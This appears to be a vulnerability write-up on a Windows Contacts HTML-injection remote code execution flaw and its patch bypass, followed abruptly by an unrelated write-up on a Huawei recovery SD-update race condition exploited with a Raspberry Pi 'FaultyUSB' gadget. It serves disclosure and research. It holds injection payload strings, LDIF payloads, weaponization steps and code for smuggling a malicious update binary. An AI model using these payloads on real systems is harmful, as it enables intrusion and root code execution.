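As a purely illustrative sketch of the HTML-injection idea (not the author’s actual PoC files), a crafted vCard field value closes the anchor that Windows Contacts renders and injects a new one pointing at an attacker-chosen local path; the payload string mirrors the ldif attributes shown elsewhere in this writeup:

```python
# Hypothetical injected value: closes the generated <a> element and opens a
# new one with an attacker-controlled href (a local path in this case).
INJECT = '"></a><a href="..\\hidden\\payload.lnk">Run-installer...</a>'

# Minimal vCard 2.1 skeleton carrying the injection in the URL property.
vcf = "\r\n".join([
    "BEGIN:VCARD",
    "VERSION:2.1",
    "N:Microsoft",
    "FN:Microsoft KB5001337-hotfix",
    "URL:" + INJECT,     # rendered as a clickable link by wab.exe
    "END:VCARD",
]) + "\r\n"
```

Saving this as a .vcf (or converting it to .contact) would produce the clickable injected anchor on affected setups.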
Going further, while testing rundll32 as an attack vector, I noticed that it wasn’t possible to pass arguments to the chosen payload executable. However, using a .lnk file that targets the chosen executable, command-line arguments can be used. It’s a bit tricky, but it works.
This looks more interesting because there’s no need to drop an executable on the target system.
Impact
Remote Code Execution as the currently logged-in user.
Proofs of Concept
A file association must exist for Windows Contacts to open .vcf files.
Update 2022/07/25: For contact files (.contact) there is only one application that opens them by default: Windows Contacts, even when MS Office is installed on the target system.
dllmain.cpp: DLL library used as payload (payload.bin).
payload.cpp: Executable used as payload (payload.exe).
Further exploitation
For further exploitation — and as the vulnerability doesn’t allow loading files from remote shared locations — the «search-ms» URI protocol is an interesting vector. You’ll find proofs of concept that only trigger a local binary like calc or notepad, and more complex ones that I’ve named weaponized exploits, because they don’t execute local files. These PoCs & exploits are located in ./further-pocs/.
Modify file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location.
Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/.
Run poc/exploit files depending on the case.
For further info, watch the videos located in ./videos:
After receiving Update 2022/07/21 from MSRC, I decided to take a look at the .contact file extension to confirm whether it’s the same case as the one found by the original discoverer, and of course it is. My first proof of concept just used a different file format, but the bug is the same. Using wabmig.exe, located in «C:\Program Files\Windows Mail», it’s possible to convert all the VCF files to contact files.
And as mentioned in the intro updates, these files are opened by Windows Contacts (default program).
The steps to reproduce are the same as those used for VCF files. The same restrictions observed with VCF files apply to contact files; that is, it’s not possible to use remote shared locations in the «href» attribute, but it’s still possible to use local paths or the «search-ms» URL protocol.
These are all the files added or modified to exploit Contact files:
As mentioned in the intro updates, this further research got me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data and exploit the bug. This was finally achieved thanks to the ldap URI scheme.
So, by setting up a rogue LDAP server and serving the payload data, it’s possible to use this URL protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that I was unable to get this working with the «wwwhomepage» attribute as indicated here, but it should theoretically work.
The crafted ldif content is just something like this:
...
dn: dc=org
dc: org
objectClass: dcObject
dn: dc=example,dc=org
dc: example
objectClass: dcObject
objectClass: organization
dn: ou=people,dc=example,dc=org
objectClass: organizationalUnit
ou: people
dn: cn=Microsoft,ou=people,dc=example,dc=org
cn: Microsoft
gn: Microsoft
company: Microsoft
title: Microsoft KB5001337-hotfix
mail:"></a><a href="..\hidden\payload.lnk">Run-installer...</a>
url:"></a><a href="..\hidden\payload.exe">Run-installer...</a>
wwwhomepage:"></a><a href="notepad">Run-installer...</a>
objectclass: top
objectclass: person
objectClass: inetOrgPerson
...
And the code for the rogue LDAP server was borrowed from the quick-start server of the ldaptor project, located here.
This is a summary of target applications:
Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera.
MS Word.
PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader).
The steps to reproduce are:
Copy ./further-pocs into remote shared location (SMB or WebDav).
./further-pocs/ldap-rogue-server/ldap-server.py: Python script based on the ldaptor server sample, which runs on Python 2.7 and serves the crafted data to exploit the bug through the ldif attributes mail, url and wwwhomepage.
CVE-2022-44666: Patch analysis and incomplete fix
On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as CVE-2022-44666.
The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been:
This function first checks whether the URL is valid in (5); then it checks whether it starts with «http» or «https» in (6). This code path looks safe enough. Coming back to the function «fnSummaryProc», there’s another code path that could help bypass the fix in (3).
One thing caught my attention in (7), where the code checks whether a «@» char exists. It then calls the function «IsDomainName» to check whether the string after the «@» char is a domain name:
__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)
{
int v3; // edi
int v4; // ebx
int v5; // er9
__int64 v6; // rdx
v3 = a3;
v4 = a2;
if ( !a1 )
return 0i64;
LABEL_2:
v5 = *a1;
if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E )
return 0i64;
while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) )
{
if ( (unsigned __int16)v5 >= 0x80u )
return 0i64;
if ( (unsigned __int16)(v5 - 10) <= 0x36u )
{
v6 = 19140298416324617i64;
if ( _bittest64(&v6, (unsigned int)(v5 - 10)) )
return 0i64;
}
if ( (_WORD)v5 == 46 )
{
a1 = CharNextW(a1);
if ( a1 )
goto LABEL_2;
return 0i64;
}
a1 = CharNextW(a1);
v5 = *a1;
}
if ( v4 )
{
if ( (_WORD)v5 != 0x3E )
return 0i64;
if ( v3 )
*a1 = 0;
}
return 1i64;
}
So the bypass for the fix is pretty simple: it’s just necessary to use a single «@» char. Symlink href attributes like these will successfully bypass the fix:
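The concrete href examples aren’t reproduced here, but a rough Python model of the decompiled checks (an assumption-laden reimplementation for illustration, not the actual wab32 code — the a2/a3 «stop at '>'» mode is not modeled) suggests why appending «@» plus any token slips past the fix:

```python
def is_domain_name(s: str) -> bool:
    # Model of the decompiled IsDomainName. The bitmask 19140298416324617
    # (bits 0, 3, 50, 54 over char-10) rejects \n, \r, '<' and '@'.
    BAD = {"\n", "\r", "<", "@"}
    if not s or s[0] == ".":
        return False
    for i, c in enumerate(s):
        if ord(c) >= 0x80 or c in BAD:
            return False
        if c == ".":
            # a dot must be followed by another valid label character
            if i + 1 >= len(s) or s[i + 1] == ".":
                return False
    return True

def is_internet_address(href: str) -> bool:
    # Model of the patched check: anything containing '@' whose suffix
    # passes IsDomainName is treated as an e-mail address.
    at = href.find("@")
    return at != -1 and is_domain_name(href[at + 1:])
```

Under this model, a local path such as ..\hidden\payload.lnk fails the check, but the same path with a «@x» suffix passes and reaches «SafeExecute».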
The target user has to belong to the administrators group; if not, there’s a UAC prompt.
The diagcab file has to be signed, so the code-signing certificate must be installed on the target computer.
A real attack scenario would involve stealing a code-signing certificate that is actually installed on the target system. But as this is just a proof of concept, a self-signed code-signing certificate was generated and used to sign the diagcab file, named @payload.diagcab.
So, in order to repro, the certificate located in cert.cer needs to be installed under Trusted Root Certification Authorities like this:
To finally elevate privileges, token stealing/impersonation could be used. In this case, the «parent process» technique was chosen. A modified version of this script was included with the resolver scripts.
Remember the vulnerable code in the function «fnSummaryProc»:
...
LABEL_44:
SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute
return 1i64;
}
}
else
{
if ( v23 )
v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@"
else
v32 = 0;
v29 = v7;
if ( v32 )
{
v30 = v23;
goto LABEL_44;
}
}
...
The function «IsInternetAddress» was intentionally created to check whether the href attribute corresponds to an email address. So my proposed fix (following the imported functions that the library already uses) would be:
...
if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check out the href really starts with "mailto:"
{
v30 = v23;
goto LABEL_44;
}
...
As simple as that: this check is only needed before calling «SafeExecute». Just testing whether the target string (v23) starts with «mailto:» would fully fix the bug, IMHO.
Unofficial fix
Some days/weeks ago I contacted @mkolsek of 0patch — who, by the way, is always very kind to me — to inform him about this issue, and he told me it has been receiving an unofficial fix on Windows 7 since then (4 years ago). That was a surprise and good news!
It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends «http://» to the attacker-controlled string passed in the href attribute if it doesn’t start with «mailto:», «http://» or «https://», which is enough to fully fix the issue. It’s now going to be extended to the latest Windows versions; only some offsets need updating.
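The described micropatch behavior fits in a few lines; this is a model of the logic as described above, not 0patch’s actual code:

```python
def micropatch_href(href: str) -> str:
    # Prepend "http://" unless the attacker-controlled href already starts
    # with one of the allowed schemes, neutralizing local-path payloads.
    if href.lower().startswith(("mailto:", "http://", "https://")):
        return href
    return "http://" + href
```

A local-path payload like ..\payload.exe@x then becomes an (invalid) http URL instead of something ShellExecute would run.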
Either way, it would be better to get an official patch.
Acknowledgments
@hyp3rlinx: Special shout-out and acknowledgement, because he began this research some years ago and his work was essential for this writeup. He should also have been credited for finding this, but unfortunately I was unable to contact him in time. It has since been done (Update 2023/02/08).
Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed remote or local attackers to achieve root-privilege code execution. After Huawei fixed the vulnerabilities we reported, we decided to take a second look at the new and improved recovery-mode update process.
This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Our advisory for the vulnerability is published here.
The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” — a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive — and exploiting this vulnerability to achieve arbitrary code execution as root!
Huawei SD-update: Updates via SD Card
Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the employed chipset (HiSilicon, Qualcomm, MediaTek) or the base OS (EMUI, HarmonyOS) of a device.
This common update solution in fact has many ways to apply a system update; one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on external media, such as an SD card or a USB flash drive. After reverse engineering how Huawei implements this mode, we identified a logic vulnerability in the handling of the update file located on external media: the update file gets reread between different verification phases.
While this basic vulnerability primitive is straightforward, exploiting it presented some interesting challenges, not least of which was that we needed to develop a custom software emulation of a USB flash drive to be able to provide the recovery with different data on each read; we also had to identify additional gaps in the update process’s authentication implementation to make arbitrary code execution as root possible in recovery mode.
Time-of-Check to Time-of-Use
The root cause of the vulnerability lies in an unfortunate design decision in the external-media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in place.
From a bird’s-eye view, the update process contains two major steps: verification of the ZIP file signature, and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. it first discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.
So in the case of a legitimate update archive, once verification succeeds, the recovery reads the media again to perform the actual installation. But a malicious actor can swap the update file right between the two stages, so the installation phase would use a different, unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability: a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!
Attacking Multiple Reads in the Recovery Binary
With an off-the-shelf USB flash drive, it is clear that, for a given offset, two reads without intermediate writes must return the same data; otherwise the drive would be considered faulty. In terms of the update procedure, this means data consistency is preserved: at every point during the update, the data on the external drive matches what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.
Now consider a “faulty” USB flash drive that returns different data when the same offset is read twice (of course, without any writes in between). This breaks the data-consistency assumption of the update process, as different update steps may see the update file differently.
The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification. These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media. For example, in the case of multiple file system accesses of the same location, the
Accordingly, multiple kinds of exploitation goals can be set. For example, by modifying only the content of the UPDATE.APP file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash. A more generic approach is to gain code execution just before writing to flash in the EreInstallPkg function, by smuggling a custom update-binary into the ZIP file.
In the following we are going to use the approach of injecting a custom binary in order to achieve the arbitrary code execution by circumventing the update archive verification.
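To make the injection concrete, here is a minimal sketch of the two ZIP archives involved. The update-binary path inside the archive comes from the recovery code flow (it is extracted to /tmp/update_binary and executed); the payload contents and the UPDATE.APP placeholder are purely illustrative — a real pristine archive is a signed Huawei update:

```python
import io
import zipfile

UPDATE_BINARY = "META-INF/com/google/android/update-binary"

def build_zip(update_binary_payload: bytes) -> bytes:
    # Build an in-memory update archive with the well-known update-binary
    # entry plus a placeholder partition image.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(UPDATE_BINARY, update_binary_payload)
        z.writestr("UPDATE.APP", b"...")   # placeholder, not a real image
    return buf.getvalue()

# served during signature verification (stand-in for the signed original)
pristine = build_zip(b"#!/sbin/sh\n# original update-binary\n")
# served during installation: the smuggled, attacker-controlled binary
malicious = build_zip(b"#!/sbin/sh\n/sbin/sh /tmp/attacker.sh\n")
```

The exploit then only has to ensure the recovery sees pristine bytes while verifying and malicious bytes while installing.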
At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effect on exploitability. For readability, this challenge is outlined in the next section; for now we continue with the assumption that we can swap results between repeated read operations.
Sketching out the code flow of an update procedure helps in understanding exactly where multiple reads can occur. Since our last exploit of Huawei’s recovery mode, some things have changed (e.g. functions got renamed), so the update flow is detailed again here for clarity.
First of all, the “SD-update” method is handled by HuaweiUpdateNormal, which essentially wraps the HuaweiUpdateBase function. Below is an excerpt of the function call tree of HuaweiUpdateBase, mostly indicating the functions which interact with the update media or contain essential verification functions.
The functions in square brackets divide the update process into three phases:
Device firmware version compatibility checking
Android signature verification, update type and version checking
Update installation via the provided update-binary file
In the first stage, the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse-engineered pseudocode.)
The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection on the compatibility of the update and the device.
int HuaweiOtaUpdate(int argc, char **argv) {
...
log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
...
ret = DoOtaUpdate(argc, argv);
...
}
int DoOtaUpdate(int argc, char **argv) {
... /* tidy the update package paths */
g_totalPkgSz = 0;
  for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * The media which contains the update package gets mounted here *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    MountSdCardWithRetry(path_list[pkgIndex],5);
    ... /* ensuring that the update package does exist */
    g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
  }
log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);
result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
if ((result & 1) == 0) {
log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
return 1;
}
result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
return 1;
}
result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
return 1;
}
...
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
push_command_stack(&command_stack,3);
package_path = path_list[pkgIndex];
... /* ensure the package does exists */
... /* update the visual update progress bar */
log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
pop_command_stack(&command_stack);
log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
push_command_stack(&command_stack,4);
log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
package_path);
/* 'IsPathNeedMount' returns true for the SD update package paths */
needs_mount = IsPathNeedMount(package_path_string);
ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);
... /* update the visual update progress bar */
}
}
int MountSdCardWithRetry(char *path, uint retry_count) {
... /* sanity checks */
if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* USB drives mounted under the '/usb' path, so this path is taken *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
for (trial_count = 1; trial_count < retry_count; trial_count++) {
if (hw_ensure_path_mounted(path))
return 0;
... /* error handling */
sleep(1);
}
log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
return -1;
}
if (hw_ensure_path_mounted(path)) {
... /* error handling */
return -1;
}
return 0;
}
Finally, in the third stage, the update installation begins by extracting the update-binary from the update archive and executing it. From this point forward, the bundled update binary handles the rest of the update process, like extracting the UPDATE.APP file containing the actual data to be flashed.
uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
... /* create and write the 'path' value into the 'last_install' file */
if (!path || g_otaUpdateMode != 1 || get_current_run_mode() != 2) {
log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
ret = hw_setup_install_mounts();
} else {
... /* with SD update mode this path is not taken */
}
if (!ret) {
log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
"Err","install_package",0x5b8);
return 1;
}
... /* logging and visual progess related functions */
ret = do_map_package(path, need_mount & 1, &package_map);
if (!ret) {
log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
return 2;
}
zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
... /* error handling */
updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
push_command_stack(&command_stack,0xd);
... /* error handling */
unlink("/tmp/update_binary");
updatebinary_fd = creat("/tmp/update_binary",0x1ed);
mzExtractZipEntryToFile(&archive,updatebinary_entry,updatebinary_fd);
EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
... /* FindUpdateBinaryFunc: check the kind of the update archive */
mzCloseZipArchive(&archive);
...
if (fork() == 0) {
...
execv(updatebinary_path, updatebinary_argv);
_exit(-1);
}
log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
push_command_stack(&command_stack,0x16);
...
}
int hw_setup_install_mounts(void) {
...
for (partition_entry : g_partition_table) {
if (!strcmp(partition_entry, "/tmp")) {
if (hw_ensure_path_mounted(partition_entry)) {
log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
return -1;
}
}
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Every entry in the partition table gets unmounted except /tmp *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
else if (hw_ensure_path_unmounted(partition_entry)) {
log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
if (!strcmp(partition_entry,"/data") && !try_umount_data())
log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
}
}
return 0;
}
int do_map_package(char *path, bool needs_mount, void *package_map) {
... /* sanity checks */
if (needs_mount) {
if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
return 0;
}
for (trial_count = 0; trial_count < 10; trial_count++) {
log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* needs_mount = true, so the USB flash drive gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
if (hw_ensure_path_mounted(path)) {
log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
return 0;
}
... /* error handling */
sleep(1);
}
... /* error handling */
}
if (sysMapFile(path,package_map) == 0) {
log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
return 1;
}
log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
return 0;
}
Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards, because the recovery process will try to extract and run the update-binary file of the update archive. Thanks to these multiple reads, the attacker can therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges:
Version checking stage: construct a valid SOFTWARE_VER_LIST.mbn file
Signature verification: supply a pristine update archive
Installation: inject the custom update-binary
Circumventing Linux Kernel Caching Of External Media
The previous section introduced our “straightforward” exploitation plan.
However, in practice, it does not suffice to just treat the file read syscalls of the update binary as if they could directly result in a unique read request to external media.
The relevant update files are actually mmap-ed by the update binary, and the generated memory read accesses get handled first by the file system API, then by the block device layer of the Linux kernel, and finally, after all those layers, they get forwarded to the external media. The file system API uses the actual file system implementation (e.g. exFAT) to turn the high-level requests (e.g. “read the first 0x400 bytes from the file named /usb/update_sd_base.zip”) into lower-level accesses of the underlying block device (e.g. “read 0x200 bytes from offset 0x12340000 and read 0x200 bytes from offset 0x56780000 on the media”). The block device layer generates the lowest-level request, which can be interpreted directly by the storage media, e.g. SCSI commands in the case of a USB flash drive.
In addition, the Linux kernel caches the read responses of both the file system API (page cache) and the block devices (block cache, part of the page cache). So the second time the same read request arrives, the response may be served from cache instead of the storage media, depending on the amount of free memory.
Therefore, in the real world, repeated reads of external media normally do not occur, thanks to the caching of the operating system. In other words, whether a memory access issued by the recovery binary actually translates into a direct read request to the external media is up to the Linux kernel's caching algorithm, and depends heavily on the amount of free memory available. In practice, our analysis showed that the combination of the caching policy and the roughly 7 GB of free memory (on flagship phones) works surprisingly well: virtually zero rereads occur while handling update files, which are at most 5 GB in size and thus fit into memory as a whole. So, at first glance, you might think that the Linux kernel's caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!
We can take a step back from the caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we've previously defined! The file cache of the Linux kernel is naturally bound to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command starts with an empty cache state, so the update file must be read again directly from the external media. This deterministically enables an attacker to supply a different update archive, or even a completely new file system, at each mount command, which can eventually be used to bypass the cryptographic verification and supply an arbitrary update archive as per above. Phew 🙂
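To make the remount-driven swap concrete, here is a toy model of the idea (all names, thresholds, and image contents are illustrative, not the actual FaultyUSB implementation): each mount forces a re-read of the file system metadata, so counting those metadata reads lets the emulated drive serve a different backing image per update phase.

```python
# Toy model of the FaultyUSB idea: serve a different backing image per
# update phase, switching on observed "mount-like" accesses. All names
# and thresholds here are illustrative, not the real implementation.

class FaultyDrive:
    def __init__(self, phase_images, mount_marker_offset):
        self.phase_images = phase_images                # one raw image per phase
        self.mount_marker_offset = mount_marker_offset  # fs metadata offset
        self.mounts_seen = 0

    def read(self, offset, length):
        # Reading the file system metadata region looks like a (re)mount:
        # the kernel's cache was flushed on unmount, so it must re-read it.
        if offset == self.mount_marker_offset:
            self.mounts_seen += 1
        phase = min(self.mounts_seen, len(self.phase_images)) - 1
        image = self.phase_images[max(phase, 0)]
        return image[offset:offset + length]

# Three phases: version check, signature verification, installation.
drive = FaultyDrive(
    phase_images=[b"VERSION-OK......", b"PRISTINE-SIGNED.", b"EVIL-UPDATE-BIN."],
    mount_marker_offset=0,
)
drive.read(0, 4)   # mount 1: the version check sees the first image
drive.read(8, 4)   # ordinary read, still phase 1
drive.read(0, 4)   # mount 2: verification sees the pristine image
drive.read(0, 4)   # mount 3: installation sees the malicious image
```

The point of the sketch is only that the phase transitions are observable from the device side, with no cooperation from the host.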
Creating FaultyUSB
Based on the above, we had an exploit plan, but what was left was actually implementing our previously discussed "FaultyUSB": a USB flash drive (USB-OTG mass storage) which can detect the mount events and alter the response data based on a trigger condition. In the following, we give a brief, practical guide on how we set up our test environment.
Raspberry Pi As A Development Platform
The Linux kernel has support for USB OTG mass storage device class in general, but we needed to find a computer which has the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for the ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) model was used, as it supports USB OTG mode on its USB-C connector.
“Raspberry Pi OS Lite (64-bit)” (2022-04-04 release) is used as a base image for the RPi and written to an SD card. The size of the SD card is indifferent as long as the OS fits it; a minimum of approx. 2 GB is recommended.
Writing the image to the SD card is straightforward.
Then we mount the first partition, create a user account file and the configuration file, and also enable the SSH server. The userconf.txt file below defines the pi user with the raspberry password. The config file disables Wi-Fi and Bluetooth to lower power usage, and also configures the USB controller in OTG mode. The kernel command line loads the USB controller with the mass storage module.
Finally, we can put the SD card back into the RPi and connect it to a router via the Ethernet interface. By default, Raspberry Pi OS tries to negotiate an IP address via DHCP and broadcasts raspberrypi.local over mDNS, so at first we simply connected to it over SSH with the previously configured username and password. We didn't find DHCP reliable enough, however, so we decided to use a static IP address instead.
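For reference, such boot-partition files could look like the following. This is a sketch based on the standard Raspberry Pi OS mechanisms (userconf.txt, config.txt overlays, cmdline.txt module loading); the password hash placeholder and the exact overlay set are ours, not necessarily the article's exact configuration:

```
# userconf.txt -- "pi" user; generate the hash with: openssl passwd -6 raspberry
pi:$6$...hash-generated-by-openssl...

# config.txt additions -- disable radios, switch the USB controller to OTG mode
dtoverlay=disable-wifi
dtoverlay=disable-bt
dtoverlay=dwc2,dr_mode=peripheral

# cmdline.txt addition -- load the mass storage gadget module at boot
modules-load=dwc2,g_mass_storage

# an empty file named "ssh" on the boot partition enables the SSH server
```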
The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. When supplying power from the IO header, the regulated 5 V also appears on the VDD pins of the USB-C connector, and when connected to a Huawei phone, the phone incorrectly detects the RPi as a USB host instead of the desired OTG device. As it turns out, the USB-C connector on the RPi is in fact not fully USB-C compliant…
Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot up, and Huawei phones cut the power while rebooting into recovery mode. This means that the RPi shuts down for lack of power, and the target Huawei phone only re-enables power over USB-C once it has already booted into recovery mode. That's why it is possible (and during our development this occurred several times) that the RPi misses the recovery's timeout window for detecting a USB drive, simply because it cannot boot up fast enough.
One way to solve this problem is to boot the phone into eRecovery mode by holding the Power and Volume Up buttons, because that way the update doesn't begin automatically, giving the RPi some time to boot up. But we wanted to support a more comfortable way of updating, from the "Project Menu" application ("Software Upgrade" / "Memory card Upgrade" option), which installs the archive automatically without waiting for any user interaction.
Our solution was to power the RPi through a USB-C breakout board with a dedicated power supply adapter. The breakout board passes the data lines through to the target Huawei phone, but the VDD lines toward the phone are disconnected (i.e. the PCB traces are cut) to prevent the RPi from being recognized as a host device. With this setup, the RPi can be powered independently of the target device, and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.
To further tweak the OS boot time and power consumption, we disable a few unnecessary services:
To further optimize power consumption, we disabled as much of the (currently unnecessary) GPU subsystem as we could. To avoid premature write-exhaustion of the SD card, we also disable persisting the log files, because we are about to generate quite a few megabytes of them.
Finally, we restart the RPi, verify that it is still accessible over SSH, and shut it down in preparation for a kernel build.
Kernel Module Patching
The main requirement for the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different results based on the current stage. The most obvious place to implement such a feature is directly in the mass storage implementation, which is located at drivers/usb/gadget/function/f_mass_storage.c in the Linux kernel.
The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process, a very simple counting algorithm proved to be sufficient: specific parts of the file system appear to be read only during mount events, so by counting mount-like access patterns, the update stage can be recovered.
While the trigger condition is active, the read responses are modified by masking them with zeros. The read address and the masking area size should be configured to cover the smuggled ZIP at the end of the update archive.
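A compact sketch of this counting-and-masking logic, in Python for readability (the real patch is C code in f_mass_storage.c, and all constants here are hypothetical):

```python
# Sketch of FaultyUSB's read path (illustrative only): count mount-like
# reads to track the update stage, and while the trigger is active, zero
# out the configured region that hides the smuggled ZIP. Once a further
# mount occurs (the installation phase), masking stops again, so the
# smuggled content becomes visible exactly when it is executed.

MOUNT_METADATA_OFFSET = 0    # fs metadata read => "mount-like" access
TRIGGER_AFTER_MOUNTS = 2     # hide the payload during mount 2 (verification)
MASK_OFFSET = 0x100          # start of the smuggled ZIP in the image
MASK_LENGTH = 0x40           # size of the area to blank

mounts_seen = 0

def handle_read(image, offset, length):
    global mounts_seen
    if offset == MOUNT_METADATA_OFFSET:
        mounts_seen += 1
    data = bytearray(image[offset:offset + length])
    if mounts_seen == TRIGGER_AFTER_MOUNTS:
        # overlap of [offset, offset+length) with the masked window
        lo = max(offset, MASK_OFFSET)
        hi = min(offset + length, MASK_OFFSET + MASK_LENGTH)
        for i in range(lo, hi):
            data[i - offset] = 0
    return bytes(data)

image = b"\xaa" * 0x200
handle_read(image, 0, 0x10)                      # mount 1: version check
visible = handle_read(image, MASK_OFFSET, 0x10)  # payload visible in phase 1
handle_read(image, 0, 0x10)                      # mount 2: trigger active
hidden = handle_read(image, MASK_OFFSET, 0x10)   # payload now reads as zeros
```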
